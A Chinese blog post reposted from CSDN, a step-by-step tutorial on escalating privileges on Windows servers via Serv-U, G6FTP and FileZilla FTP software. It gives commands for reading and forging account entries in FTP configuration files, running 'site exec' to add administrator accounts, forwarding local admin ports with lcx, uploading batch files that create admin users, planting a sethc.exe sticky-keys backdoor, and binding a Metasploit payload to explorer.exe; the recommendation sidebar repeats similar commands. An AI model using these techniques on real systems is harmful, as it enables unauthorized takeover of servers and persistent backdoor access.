第三方软件提权之FTP软件

已于 2023-02-15 10:40:48 修改
阅读量694 收藏
点赞数 2
分类专栏: 工具的使用 文章标签: 服务器 网络 linux
于 2023-02-15 10:40:26 首次发布
原文链接:https://blog.csdn.net/weixin_44508748/article/details/107118750?ops_request_misc=&request_id=&biz_id=102&utm_term=G6ftp%E6%8F%90%E6%9D%83&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-2-107118750.142^v73^wechat,201^v4^add_
版权

server_U 提权

对于不可写权限,serv_u 6.4以下的,如果默认密码没有修改的,直接可以提权。serv_u 7以上的可以修改下脚本提权目录,不要用默认的C盘,改在其他盘符用脚本提权。serv-u的默认端口是43958,密码文件的安装目录 c:\Program Files\Serv-u\SerUDaemon.ini
图片来源见水印
一、读取配置文件
1.server-u默认安装目录下的ServUDaemon.ini文件记录着所有的ftp账号信息(32位默认安装路径C:\Program Files (x86)\RhinoSoft.com\Serv-U\ServUDaemon.ini),拿到密码可以直接拿去md5解密
在这里插入图片描述
2.如果有权限修改ServUDaemon.ini文件,可直接增加高权限ftp用户。添加账号的password值是加盐md5加密后的值(例如:盐是cq,就md5加密cq123456,然后Password=cq+md5(cq123456)
在这里插入图片描述
3.如果得到的ftp账号权限是管理权限,可直接ftp登录执行命令创建用户

quote site exec net user test test123 /add
quote site exec net localgroup administrators test /add

如图用户创建成功,而且是管理员权限
在这里插入图片描述

方法二、大马通过server-u的管理员账号创建新的ftp账号,然后用大马创建的账号登录进行提取在这里插入图片描述## 方法三、直接提权
server-u的管理员账号权限较大,相当于系统权限,可以通过管理员账号直接创建用户,并且加入到管理员组。
在这里插入图片描述如果server-U 用户默认密码被修改了,下载ServUAdmin.exe文件用c32打开就可以找到账号及密码,注意使用迅雷可能会出现问题,建议直接用浏览器下载
在这里插入图片描述

G6 ftp提权ftp

G6ftp安装目录下remoteadmin/remote.ini文件包含有账号信息,可通过解密得到账号密码,有修改权限也可以直接修改或添加用户
在这里插入图片描述
g6ftp默认监听在127.0.0.1的8021端口上,所以需要使用lcx 工具将该端口转发出去。如果无法执行cmd命令,需要在可读可写目录上传cmd和lcx等程序,然后才能进行端口转发
1.端口转发
在这里插入图片描述

lcx.exe -tran 8222 127.0.0.1 8021
#转发127.0.0.1 8021端口到全IP 8222端口

在服务器里面查看。确定已经转发成功
在这里插入图片描述
2.远程登录
端口转发完成后,直接使用g6ftp客户端以管理员用户远程登录软件。这里分别填入转发后的端口已经在最开始得到的用户名及密码
在这里插入图片描述
连接成功
在这里插入图片描述
3.创建ftp用户
在这里插入图片描述设置用户家目录
在这里插入图片描述
给该账号所有权限
在这里插入图片描述4.新建批处理命令,分别填入命令名称以及要执行的批处理文件路径
在这里插入图片描述
5.通过新建的ftp用户上传文件1.bat
在这里插入图片描述

#批处理文件内容
net user ftptest 123.com /add
net localgroup administrators ftptest /add

6.执行批处理命令,客户端会加载支持此批处理

quote site useradd

在这里插入图片描述
7.提权成功,新建了ftptest账户,且为管理员权限
在这里插入图片描述

filezilla提权

filezilla是一款开源的FTP服务器和客户端的软件。若安装了服务器端默认只侦听127.0.0.1的14147端口。并且默认安装目录目录下有两个敏感文件 filezilla server.xml(包含了用户信息)和filezilla server interface.xml(包含了管理信息)
C:\Program Files\FileZilla Server\FileZilla Server Interface.xml
在这里插入图片描述
提权思路:
1.下载这个两个文件,拿到管理密码
2.配置端口转发,登录远程管理ftp server
提权步骤:
1.端口转发

C:\Inetpub\wwwroot\8099\lcx.exe -tran 14148 127.0.0.1 14147

在这里插入图片描述2.远程连接
转发完成后使用filezilla 服务端软件远程连接,登录成功
在这里插入图片描述
在这里插入图片描述
3.创建ftp用户
在这里插入图片描述4.设置密码
在这里插入图片描述
5.设置家目录及控制权限
在这里插入图片描述
6. 使用filezilla客户端远程连接成功
在这里插入图片描述
7.使用cmd.exe改名为sethc.exe替换c:\windows\system32\sethc.exe生成shift后门
在这里插入图片描述
8.连接3389按5次shift 调出cmd.exe
在这里插入图片描述

 taskmgr
# 调用任务管理器
explorer.exe
# 调用桌面
net user test 123.com /add
net localgroup administrators test /add
#创建用户

注意:高版本服务器进不了登录界面,无法利用五次shift弹出cmd.exe。可以利用msf生成payload捆绑到目标cmd.exe/explorer.exe(经常使用的进程)上等待目标上线。然后进行提权

zxl2605
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ftp传输工具 3款免费的ftp传输工具(ftp客户端定时上传下载新体验)
jyhhh的博客
07-11 4126
一:iis7服务器批量管理软件 传统的ftp工具可以实现电脑与ftp服务器之间文件的上传下载,今天重点推荐的ftp软件。除了能批量管理ftp站点,还可以实现ftp定时上传、定时下载、定时备份,自动更新等。 它就是iis7服务器管理工具:官网(http://yczm.iis7.com/?ccxd) 当前可批量管理的为: 1、win系列的操作系统(含VPS、VM) 2、linux操作系统:CentOS、Ubuntu、Debian等,支持命令及可视化SFTP管理 3、linux的vnc、win的vnc 4、FTP
002--第三方软件提权FTP软件
weixin_44508748的博客
07-04 1226
server_U 提权 对于不可写权限,serv_u 6.4以下的,如果默认密码没有修改的,直接可以提权。serv_u 7以上的可以修改下脚本提权目录,不要用默认的C盘,改在其他盘符用脚本提权。serv-u的默认端口是43958,密码文件的安装目录 c:\Program Files\Serv-u\SerUDaemon.ini 方法一、读取配置文件 1.server-u默认安装目录下的ServUDaemon.ini文件记录着所有的ftp账号信息(32位默认安装路径C:\Program Files (x86)
利用Metasploit对VSFTPD2.3.4渗透攻击提权
渗透测试
05-06 1653
文章目录前言一、Metasploit中使用数据库二、利用msf中nmap扫描三、VSFTPD2.3.4渗透攻击1.威胁建模2.攻击3.提权总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、Metasploit中使用数据库 开启步骤 root@kali:~# service postgresql start root@kali:~
FTP如何端口映射?
天联SD-WAN的博客
05-23 582
FTP(File Transfer Protocol)是一种用于在网络上进行的协议。在FTP协议中,客户端和服务器通过不同的端口进行通信,其中控制连接使用端口号21,数据连接使用端口号20。由于网络环境的限制,一些情况下需要使用技术来实现FTP的正常运行。本文将介绍FTP的原理和应用。
成功搭建FTP站点并实现上传与下载
Zzzzzz的博客
07-31 3812
文件传输协议 文件传输协议(File Transfer Protocol,FTP)是用于在网络上进行文件传输的一套标准协议。 FTP允许用户以文件操作的方式(如文件的增、删、改、查、传送等)与另一主机相互通信。然而, 用户并不真正登录到自己想要存取的计算机上面而成为完全用户, 可用FTP程序访问远程资源, 实现用户往返传输文件、目录管理以及访问电子邮件等等, 即使双方计算机可能配有不同的操作系统...
FTP提升权限关键命令
无轩居 (Home of vip)
09-05 2910
Quote site exec net.exe user wofeiwo /add Quote site exec net.exe localgroup administrators wofeiwo /add
ftp第三方工具
09-13
FTP第三方工具则是为方便用户更高效、安全地与FTP服务器交互而设计的软件应用。这些工具通常提供图形用户界面(GUI),使得非技术用户也能轻松管理文件上传、下载和其他相关操作。 FTP服务器是提供FTP服务的计算机...
Ftp工具软件 Ftp工具软件
最新发布
05-29
FTP(File Transfer Protocol)工具软件是用于在互联网上进行文件传输的一种应用,它允许用户从一个计算机系统上传或下载文件到另一个系统。FTP工具软件通常具有用户友好的界面,简化了与FTP服务器交互的过程,提供...
自动检测FTP文件同步软件
05-12
1. 本程序实现了定时自动检测指定FTP服务器上指定的文件夹内文件是否更新,如果发生了更新或者添加,则自动将更新或者添加的文件下载到到本地指定的文件夹中,同时记录详细的下载日志的功能。用户可对检测间隔时间...
ftp软件 辉煌互联FTP Server v5.0
10-30
FTP(File Transfer Protocol)软件是用于在互联网上进行文件传输的一种标准协议,它允许用户从一台计算机上传或下载文件到另一台计算机。"辉煌互联FTP Server v5.0"是一款专为个人和小型企业设计的FTP服务器软件,...
ftp软件.zip_ftp 下载_ftp软件
09-23
首先,"ftp软件.zip_ftp 下载_ftp软件"的标题表明这是关于FTP软件的下载资源,可能包含了FTP客户端程序和一些相关指南。FTP软件如FileZilla是常用的FTP工具,它提供了图形化的用户界面,使得文件传输变得更加直观和...
不错的小FTP服务器((可设权限)
03-03
最方便 最简单的FTP服务器(最小绿色版) 支持权限设置
ftp服务器搭建以及用户权限的配置
07-13
ftp服务的搭建以及运用vsftp的方式配置用户权限
记一次FTP提权
weixin_34353714的博客
09-09 856
之前我已经得到一个SHELL不过没有多大的权限,如图1WScript.Shell 和Wscript.Network被干掉了没办法运行程序不过还好,FSO还是支持的,先逛逛看有什么好东西c:\没有权限打开,意料中的c:\winnt\没有此目录或没有权限打开再看看c:\windows打开了,看来是win2003的系统啊本来还打算数据库溢出返回一个CMD呢,虽然是GUEST权限的,...
webshell提权
free_xiaochen的博客
09-11 8639
提权 提权前奏 提权:主要是针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得服务器权限 通常所处的权限:  ASP/PHP 匿名权限 ASPX USER权限 JSP 通常是系统权限 收集信息:  内外网 服务器系统和版本位数 服务器的补丁情况 服务器的安装软件情况 服务器的防护软件情况 端口情况 支持脚本情况 。。...
一次有意思的提权(G6FTP
cnbird's blog
12-20 1415
一次有意思的提权(G6FTP
巧用G6FTPServer账号***台湾某图书服务器
weixin_33672400的博客
12-20 198
巧用G6FTPServer账号***台湾某图书服务器 Simeon 【antian365.com】原创    某日群里一兄弟给了一个mysql的连接地址,当日因为比较忙,所以就一直拖到今天,今天刚好有空,对该服务器进行安全检查,结果不仅获取了该网站的Webshell,而且还得到了该服务器的权限,下面将整个过程写出来跟大家分享。 (一)扫描漏洞     扫描漏洞的软件很多,俺喜欢交叉使用...
Gene6 FTP Server的web端口和ip修改
峰不疯
05-21 6652
  在何继伟的推荐下,舒春平的服务器使用了Gene6 FTP Server,一使用就喜欢上了,因为Gene6提供了通过web方式修改用户密码的功能,而且功能不弱于serv-u。虽然serv-u使用odbc(数据库)后也可以实现web方式管理,但毕竟不是初级用户能做到的,麻烦。      使用过程中很快发现问题,因为该服务器在内网,要通过端口映射来访问,何况该web界面只能用127.0.0.1的
serv-u 提权
Is0Man的博客
04-18 3935
主要提权方法: 一、serv-u ftp本地溢出权限提升(使用6.0以及以前版本) 1、用Serv-U提权综合工具生成提权工具serv_u.exe 2、先上传 serv_u.exe 到一个盘符下 比如是d盘 3、执行命令 d:\serv_u.exe 4、d:\serv_u.exe “net user username password /add” (注意命令要有引号) 5、d:\se

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值